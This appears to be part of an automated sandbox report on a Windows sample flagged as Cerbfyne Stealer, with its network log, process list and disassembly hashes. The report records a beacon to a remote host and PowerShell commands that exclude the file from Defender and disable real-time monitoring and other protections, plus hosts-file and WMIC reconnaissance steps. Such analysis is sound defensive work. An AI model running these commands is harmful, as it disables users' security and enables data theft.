                                                                                                                            Date: Tue, 26 Nov 2024 19:38:24 GMT
                                                                                                                            Server: Caddy
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.74972851.210.106.444431408C:\Users\user\Desktop\file.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-26 19:38:23 UTC262OUTGET /ws?id=ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= HTTP/1.1
                                                                                                                            Host: w.tundara.dev
                                                                                                                            User-Agent: Go-http-client/1.1
                                                                                                                            Connection: Upgrade
                                                                                                                            Sec-WebSocket-Key: +ck7nJwhsfDtHrCBl6ZoOw==
                                                                                                                            Sec-WebSocket-Version: 13
                                                                                                                            Upgrade: websocket
                                                                                                                            2024-11-26 19:38:23 UTC252INHTTP/1.1 400 Bad Request
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                            Content-Length: 40
                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                            Date: Tue, 26 Nov 2024 19:38:23 GMT
                                                                                                                            Sec-Websocket-Version: 13
                                                                                                                            Server: Caddy
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Connection: close
                                                                                                                            2024-11-26 19:38:23 UTC40INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a 7b 22 65 72 72 6f 72 22 3a 22 45 72 72 65 75 72 20 57 65 62 53 6f 63 6b 65 74 22 7d
                                                                                                                            Data Ascii: Bad Request{"error":"Erreur WebSocket"}


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:14:37:57
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                            Imagebase:0x7ff608fb0000
                                                                                                                            File size:26'987'008 bytes
                                                                                                                            MD5 hash:9096F57FA44B8F20EEBF2008A9598EEC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_CerbfyneStealer, Description: Yara detected Cerbfyne Stealer, Source: 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CerbfyneStealer, Description: Yara detected Cerbfyne Stealer, Source: 00000000.00000000.1232496497.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:2
                                                                                                                            Start time:14:37:58
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe
                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:14:37:58
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:6
                                                                                                                            Start time:14:38:01
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:7
                                                                                                                            Start time:14:38:01
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:13
                                                                                                                            Start time:14:38:06
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                            Imagebase:0x7ff75eb80000
                                                                                                                            File size:23'040 bytes
                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:14
                                                                                                                            Start time:14:38:06
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:15
                                                                                                                            Start time:14:38:06
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                            Imagebase:0x7ff75eb80000
                                                                                                                            File size:23'040 bytes
                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:16
                                                                                                                            Start time:14:38:06
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:17
                                                                                                                            Start time:14:38:12
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic os get Caption
                                                                                                                            Imagebase:0x7ff6212c0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:18
                                                                                                                            Start time:14:38:12
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:19
                                                                                                                            Start time:14:38:12
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic cpu get Name
                                                                                                                            Imagebase:0x7ff6212c0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:20
                                                                                                                            Start time:14:38:12
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:21
                                                                                                                            Start time:14:38:13
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                            Imagebase:0x7ff6212c0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:22
                                                                                                                            Start time:14:38:13
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:24
                                                                                                                            Start time:14:38:14
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic csproduct get UUID
                                                                                                                            Imagebase:0x7ff6212c0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:25
                                                                                                                            Start time:14:38:14
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Executed Functions

                                                                                                                              Function 00007FFAAC55693A Relevance: .5, Instructions: 461COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1313094154.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac550000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 269225abff1abe066d64e00625d596817c3707632f6a062117b1d705f41a5eb0
                                                                                                                              • Instruction ID: d2287b444235f6a9b04d53aef632858d86f5f1aeb81cda4bded1a8c3db933b55
                                                                                                                              • Opcode Fuzzy Hash: 269225abff1abe066d64e00625d596817c3707632f6a062117b1d705f41a5eb0
                                                                                                                              • Instruction Fuzzy Hash: BED177A5D4EACE8FF755AB6888155B97FA4EF52310B0841BEE04DC72D3DD1AE808C391
                                                                                                                              Function 00007FFAAC48B20D Relevance: .4, Instructions: 359COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1312557955.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac480000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7ed7b5af0c839d7787d0cfbbe1e847961d593975474dd58ab5fcc4de52ae88d7
                                                                                                                              • Instruction ID: 5575ef85953671e6f551a275b98dcf0e7ece122f6fbe675480357d0b32603dba
                                                                                                                              • Opcode Fuzzy Hash: 7ed7b5af0c839d7787d0cfbbe1e847961d593975474dd58ab5fcc4de52ae88d7
                                                                                                                              • Instruction Fuzzy Hash: ABA1ECA2A0DBC28FF356976C9C6E4F93FA0EF53229B0841B7D1D886193DD05650B83D5
                                                                                                                              Function 00007FFAAC4864C5 Relevance: .3, Instructions: 331COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1312557955.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac480000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5560c2666b93ed9f3e88ff0150d1dc00f52b6bee2020ecbe5a5bfed58d55c7d4
                                                                                                                              • Instruction ID: b964c8825c669adf5d357b450b578623525fefae561b740c20a45e7016c7d243
                                                                                                                              • Opcode Fuzzy Hash: 5560c2666b93ed9f3e88ff0150d1dc00f52b6bee2020ecbe5a5bfed58d55c7d4
                                                                                                                              • Instruction Fuzzy Hash: E5119D6580E7CA8FE7535B34882A0F93FB09E13214B1941E7D099CB0B3CA18A90CC792
                                                                                                                              Function 00007FFAAC4896C5 Relevance: .1, Instructions: 136COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1312557955.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac480000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 26f8be053ab44534edd6ffd3d283e3ea1db865de1b3587ad76f1f93cdac65a8a
                                                                                                                              • Instruction ID: 7f40e1cdd469013382e8f26cf70be91ade81a0e2a887b0fdda571f9b664442b6
                                                                                                                              • Opcode Fuzzy Hash: 26f8be053ab44534edd6ffd3d283e3ea1db865de1b3587ad76f1f93cdac65a8a
                                                                                                                              • Instruction Fuzzy Hash: C4311A7191CB488FDB589B5C984A6B97BE0FB59311F00426FE04DC3651DA74A8568BC2
                                                                                                                              Function 00007FFAAC36E620 Relevance: .1, Instructions: 123COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1311714682.00007FFAAC36D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC36D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac36d000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6ad2a79ce54b5f73eaee731eb677a37ba366b473c171e21e70214176a6eff328
                                                                                                                              • Instruction ID: 299e27c099b1193aa6b781dbe0faa962ee717da695bdc80e466a47a86260188a
                                                                                                                              • Opcode Fuzzy Hash: 6ad2a79ce54b5f73eaee731eb677a37ba366b473c171e21e70214176a6eff328
                                                                                                                              • Instruction Fuzzy Hash: BB41067140DBC48FE7568B2998559527FF0EF57320B1906DFE088CB1A3D625E84AC7E2
                                                                                                                              Function 00007FFAAC4833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1312557955.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac480000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b484407f86e80852704ed9439fea754a9182bbb3769865c4af3f5695b74377db
                                                                                                                              • Instruction ID: fa6fc882dfd95574baba5a2dd2e69265abbf835bfde3577d4f432220f6d2f2fa
                                                                                                                              • Opcode Fuzzy Hash: b484407f86e80852704ed9439fea754a9182bbb3769865c4af3f5695b74377db
                                                                                                                              • Instruction Fuzzy Hash: 4D01677111CB0C8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E892CB45
                                                                                                                              Function 00007FFAAC48A048 Relevance: .0, Instructions: 41COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1312557955.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac480000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e9abd40de96c8acd5ee89bc75251c27ce3cc20149f0f8816c4d39f4e072d78e0
                                                                                                                              • Instruction ID: 10496c6cc935bf1d4fa501fc0150a71429c05780199511ca484d0f4a47fdb0e6
                                                                                                                              • Opcode Fuzzy Hash: e9abd40de96c8acd5ee89bc75251c27ce3cc20149f0f8816c4d39f4e072d78e0
                                                                                                                              • Instruction Fuzzy Hash: 57F0F0308087898FDB0A9F28881A4E57FA0EF17315B04029AE45CC71A2DAA49568CBC2
                                                                                                                              Function 00007FFAAC55447D Relevance: .0, Instructions: 37COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1313094154.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac550000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3fe1a308b09bab1bb356e603d052ce45ade439a770b1ed35d634fdd97eddd33a
                                                                                                                              • Instruction ID: 04d139d57953912dac55ccb8a2d12bbd88eaa621f9d83400ff88c2ba524aa090
                                                                                                                              • Opcode Fuzzy Hash: 3fe1a308b09bab1bb356e603d052ce45ade439a770b1ed35d634fdd97eddd33a
                                                                                                                              • Instruction Fuzzy Hash: A3F0BE32A8D549CFE798EB1CE4458E873E4EF45320B1080BAE05DC70A3DE2AEC84C781
                                                                                                                              Function 00007FFAAC554730 Relevance: .0, Instructions: 35COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1313094154.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac550000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 50c4759b922146e431ed900a7a8e17e71faa2deab0f49f7c2b51934b207d1cad
                                                                                                                              • Instruction ID: b1cca3286a0ed4449803e78b86a076b4b9dff3b6192d1d751229d565710e2c40
                                                                                                                              • Opcode Fuzzy Hash: 50c4759b922146e431ed900a7a8e17e71faa2deab0f49f7c2b51934b207d1cad
                                                                                                                              • Instruction Fuzzy Hash: A1F0E232A8D5498FE798EB1CE0458A877E0EF46320B1140BAE04DC7063DA26EC45CB80

                                                                                                                              Non-executed Functions

                                                                                                                              Function 00007FFAAC4889FA Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1312557955.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac480000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: L_^$L_^$L_^$a$b
                                                                                                                              • API String ID: 0-1605990879
                                                                                                                              • Opcode ID: a16891c1ca3171c3b09e9c23b76247be41c1f23f044b0576cbf7584b4f5b8435
                                                                                                                              • Instruction ID: 3ea8c57a69f94cde64b3ddaa694ce71f5387d3225fab9b22d62875f94f61b49d
                                                                                                                              • Opcode Fuzzy Hash: a16891c1ca3171c3b09e9c23b76247be41c1f23f044b0576cbf7584b4f5b8435
                                                                                                                              • Instruction Fuzzy Hash: 3061CBD390EBC28FF25647A89C2E0B96FD0EF5361970C42FAD0A84A597D9489D1D83C6
                                                                                                                              Function 00007FFAAC4888FA Relevance: 5.1, Strings: 4, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1312557955.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac480000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: L_^$L_^$L_^$L_^
                                                                                                                              • API String ID: 0-2357752022
                                                                                                                              • Opcode ID: 12ea0b8adf912af5e3f690a735c8d616e39b85013e72f49450ea8bef193246c4
                                                                                                                              • Instruction ID: 1871d99934cbe5425aaa0684a16f5c6bca8339440b0f7451a9b627747132431e
                                                                                                                              • Opcode Fuzzy Hash: 12ea0b8adf912af5e3f690a735c8d616e39b85013e72f49450ea8bef193246c4
                                                                                                                              • Instruction Fuzzy Hash: CA31BFD390EBC39BF756075998AA0B52FE0EF2360970981F2C5E84A193ED19581E4396